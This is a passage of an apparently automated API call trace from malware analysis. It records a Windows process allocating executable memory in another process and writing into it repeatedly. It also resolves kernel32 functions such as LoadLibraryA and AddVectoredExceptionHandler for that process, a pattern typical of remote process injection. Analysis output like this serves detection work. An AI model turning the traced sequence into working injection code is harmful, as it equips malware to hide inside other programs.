nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e85290*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.336] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.336] ResetEvent (hEvent=0x794) returned 1 [0184.336] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.336] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.337] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.337] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e85290 | out: hHeap=0x2150000) returned 1 [0184.337] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.337] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.337] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.337] lstrlenA (lpString="GetConsoleMode") returned 14 [0184.337] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.337] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d95a*, nSize=0xf, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d95a*, lpNumberOfBytesWritten=0xcd978*=0xf) returned 1 [0184.338] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.338] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84e70 [0184.338] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.338] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84e70*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84e70*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.338] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.339] ResetEvent (hEvent=0x794) returned 1 [0184.339] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.339] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.339] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.339] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84e70 | out: hHeap=0x2150000) returned 1 [0184.339] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.340] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.340] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.340] lstrlenA (lpString="GetConsoleCP") returned 12 [0184.340] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.340] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d94a*, nSize=0xd, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d94a*, lpNumberOfBytesWritten=0xcd978*=0xd) returned 1 [0184.341] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.341] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85050 [0184.341] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.341] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e85050*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e85050*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.341] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.342] ResetEvent (hEvent=0x794) returned 1 [0184.342] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.342] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.342] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.342] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e85050 | out: hHeap=0x2150000) returned 1 [0184.342] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.342] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.343] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.343] lstrlenA (lpString="WriteFile") returned 9 [0184.343] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.343] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d93e*, nSize=0xa, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d93e*, lpNumberOfBytesWritten=0xcd978*=0xa) returned 1 [0184.343] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.343] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e848d0 [0184.343] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.344] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e848d0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e848d0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.344] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.344] ResetEvent (hEvent=0x794) returned 1 [0184.344] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.346] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.346] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.346] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e848d0 | out: hHeap=0x2150000) returned 1 [0184.346] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.347] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.347] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.347] lstrlenA (lpString="FlushFileBuffers") returned 16 [0184.347] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.347] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d92a*, nSize=0x11, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d92a*, lpNumberOfBytesWritten=0xcd978*=0x11) returned 1 [0184.348] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.348] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84870 [0184.348] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.348] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84870*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84870*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.349] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.350] ResetEvent (hEvent=0x794) returned 1 [0184.350] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.350] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.350] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.350] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84870 | out: hHeap=0x2150000) returned 1 [0184.350] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.351] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.351] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.351] lstrlenA (lpString="SetStdHandle") returned 12 [0184.351] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.352] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d91a*, nSize=0xd, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d91a*, lpNumberOfBytesWritten=0xcd978*=0xd) returned 1 [0184.352] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.352] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84780 [0184.352] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.353] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84780*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84780*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.353] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.354] ResetEvent (hEvent=0x794) returned 1 [0184.354] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.356] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.356] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.356] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84780 | out: hHeap=0x2150000) returned 1 [0184.356] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.357] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.357] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.357] lstrlenA (lpString="SetLastError") returned 12 [0184.357] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.358] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d38e*, nSize=0xd, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d38e*, lpNumberOfBytesWritten=0xcd978*=0xd) returned 1 [0184.359] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.359] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85290 [0184.359] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.388] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e85290*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e85290*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.389] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.389] ResetEvent (hEvent=0x794) returned 1 [0184.389] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.390] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.390] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.390] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e85290 | out: hHeap=0x2150000) returned 1 [0184.390] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.390] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.390] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.390] lstrlenA (lpString="GetProcAddress") returned 14 [0184.390] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.391] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d37c*, nSize=0xf, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d37c*, lpNumberOfBytesWritten=0xcd978*=0xf) returned 1 [0184.391] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.391] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84750 [0184.391] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.392] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84750*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84750*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.392] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.393] ResetEvent (hEvent=0x794) returned 1 [0184.394] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.394] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.394] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.394] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84750 | out: hHeap=0x2150000) returned 1 [0184.394] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.395] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.395] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.395] lstrlenA (lpString="LoadLibraryA") returned 12 [0184.395] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.396] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d36c*, nSize=0xd, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d36c*, lpNumberOfBytesWritten=0xcd978*=0xd) returned 1 [0184.396] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.396] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85080 [0184.396] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.396] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e85080*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e85080*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.397] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.397] ResetEvent (hEvent=0x794) returned 1 [0184.397] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.398] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.398] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.398] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e85080 | out: hHeap=0x2150000) returned 1 [0184.398] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.399] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.399] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.399] lstrlenA (lpString="AddVectoredExceptionHandler") returned 27 [0184.399] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.399] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d34e*, nSize=0x1c, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d34e*, lpNumberOfBytesWritten=0xcd978*=0x1c) returned 1 [0184.400] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.400] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84b70 [0184.400] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.400] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84b70*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84b70*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.400] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.401] ResetEvent (hEvent=0x794) returned 1 [0184.401] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.401] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.402] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.402] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84b70 | out: hHeap=0x2150000) returned 1 [0184.402] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.402] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.403] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.403] lstrlenA (lpString="GetModuleHandleA") returned 16 [0184.403] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.403] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d332*, nSize=0x11, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d332*, lpNumberOfBytesWritten=0xcd978*=0x11) returned 1 [0184.403] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.404] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84ff0 [0184.404] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.404] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e84ff0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e84ff0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.404] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.405] ResetEvent (hEvent=0x794) returned 1 [0184.405] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.405] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.405] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.406] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e84ff0 | out: hHeap=0x2150000) returned 1 [0184.406] VirtualFreeEx (hProcess=0x6f4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.406] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0184.406] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0184.406] lstrlenA (lpString="Sleep") returned 5 [0184.406] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x6, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0184.407] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x20000, lpBuffer=0x32b3d346*, nSize=0x6, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x32b3d346*, lpNumberOfBytesWritten=0xcd978*=0x6) returned 1 [0184.407] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.407] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e850b0 [0184.408] VirtualAllocEx (hProcess=0x6f4, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0184.408] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x1e0000, lpBuffer=0x32e850b0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e850b0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0184.408] WriteProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0184.409] ResetEvent (hEvent=0x794) returned 1 [0184.409] SignalObjectAndWait (hObjectToSignal=0x7a8, hObjectToWaitOn=0x794, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0184.409] ReadProcessMemory (in: hProcess=0x6f4, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0184.409] VirtualFreeEx 